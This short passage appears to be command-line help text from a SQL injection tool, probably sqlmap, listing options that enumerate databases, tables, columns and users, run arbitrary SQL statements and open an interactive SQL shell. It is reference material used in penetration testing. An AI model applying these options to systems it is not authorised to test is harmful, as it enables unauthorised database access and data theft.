-D DB DBMS database to enumerate
-T TBL DBMS database table to enumerate
-C COL DBMS database table column to enumerate
-U USER DBMS user to enumerate
--exclude-sysdbs Exclude DBMS system databases when enumerating tables
--start=LIMITSTART First query output entry to retrieve
--stop=LIMITSTOP Last query output entry to retrieve
--first=FIRSTCHAR First query output word character to retrieve
--last=LASTCHAR Last query output word character to retrieve
--sql-query=QUERY SQL statement to be executed
--sql-shell Prompt for an interactive SQL shell
